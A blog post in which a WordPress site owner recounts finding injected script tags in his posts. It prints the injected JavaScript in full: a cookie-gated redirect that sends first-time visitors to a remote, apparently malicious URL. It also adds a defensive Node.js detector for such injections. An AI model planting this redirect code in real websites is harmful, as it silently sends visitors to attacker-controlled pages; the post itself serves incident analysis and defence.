Malware Attack? Well, that was fun.

Posted in Eng/Sci/Tech

Thanks to the ever quick eye of Google, I found out that someone in the past 24 hours added an HTML script tag to several of my posts. It took me a while to find, but thanks to Google’s Webmaster Tools, I located the script tags and removed them. I’m not sure how they managed to place them there, but I’ve decided to play it safe and change my login to my secondary password which meets Army IT standards.

If anyone knows scripting, they’re welcome to try and explain to me what the following code does:

// Sets a cookie named c_name that expires epiedas days from now.
function secooe(c_name,value,epiedas){
    var exdate=new Date();
    exdate.setDate(exdate.getDate()+epiedas);
    document.cookie=c_name+ "=" +escape(value)+
        ((epiedas==null) ? "" : ";expires="+exdate.toGMTString());
}

// Returns the value of cookie c_name, or "" if it is not set.
function getCookie(c_name){
    if (document.cookie.length>0)
    {
        cstatr=document.cookie.indexOf(c_name + "=");
        if (cstatr!=-1)
        {
            cstatr=cstatr + c_name.length+1;
            c_end=document.cookie.indexOf(";",cstatr);
            if (c_end==-1) c_end=document.cookie.length;
            return unescape(document.cookie.substring(cstatr,c_end));
        }
    }
    return "";
}

// First visit (marker cookie absent): set the marker for 20 days, then
// replace the top-level page location with the remote URL.
var name=getCookie("pma_visited_theme2");
if (name==""){
    secooe("pma_visited_theme2","1",20);
    var url="http://127dgsavhcxy23.oeema.info/in2.php?n=508102";
    window.top.location.replace(url);
}else{
    // Marker cookie already set: do nothing, so a repeat visitor sees the normal page.
}

UPDATE: The scripting tags reappeared a few days later, so I had to devote a bit more time to this problem. After examining the MySQL databases, I realized that the attack was not through the front end (i.e. someone getting into WordPress and pasting “[evil, malicious script. muahaha]” directly into my posts). My posts saved in the database were clean. That meant that someone was adding the malware/script tags in “post processing,” probably through a corrupted plug-in or core file in WordPress. I reinstalled WordPress and pruned back my plug-ins. Time will tell if I triumphed.
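
The update above describes posts that are clean in the database while the served pages carry the script. As an added example (not the author's code and not part of WordPress), this Node.js check compares a post body as stored with the same post body as served and reports inline scripts that exist only in the served copy, tagged with the behaviours seen in the sample above. The function names and the sample HTML are constructed for illustration, and it assumes the caller has already fetched both copies of the post body.

```javascript
// Added example; function names and sample HTML are constructed for illustration.
const INDICATORS = [
  ["top-level redirect", /top\.location(?:\.href)?\s*(?:=(?!=)|\.replace\s*\()/],
  ["sets a cookie", /document\.cookie\s*=(?!=)/],
  ["reads a cookie", /document\.cookie\.(?:indexOf|substring|length)/],
  ["hard-coded remote URL", /["']https?:\/\/[^"']+["']/],
];

// Bodies of inline scripts, whitespace-normalized; <script src=...> is skipped.
function inlineScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (/\bsrc\s*=/i.test(m[1])) continue;
    const body = m[2].replace(/\s+/g, " ").trim();
    if (body) out.push(body);
  }
  return out;
}

// Inline scripts present in the served post body but absent from the stored one.
function findInjectedScripts(storedHtml, renderedHtml) {
  const known = new Set(inlineScripts(storedHtml));
  return inlineScripts(renderedHtml)
    .filter((body) => !known.has(body))
    .map((body) => ({
      preview: body.slice(0, 60),
      indicators: INDICATORS.filter(([, re]) => re.test(body)).map(([n]) => n),
    }));
}

// Constructed sample: what the database holds vs. what the server sent.
const STORED = '<p>Trip report.</p><script>var gallery = 1;</script>';
const RENDERED = STORED +
  '<script>\nif (document.cookie.indexOf("seen=") == -1) {\n' +
  '  document.cookie = "seen=1";\n' +
  '  window.top.location.replace("http://example.invalid/landing");\n}\n</script>' +
  '<script src="/js/theme.js"></script>';

for (const f of findInjectedScripts(STORED, RENDERED)) {
  console.log(f.indicators.join(", "), "|", f.preview);
}
```

A finding here with a clean database copy points at the rendering path (theme, plug-in or core files) rather than at the post editor, which matches the conclusion in the update.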
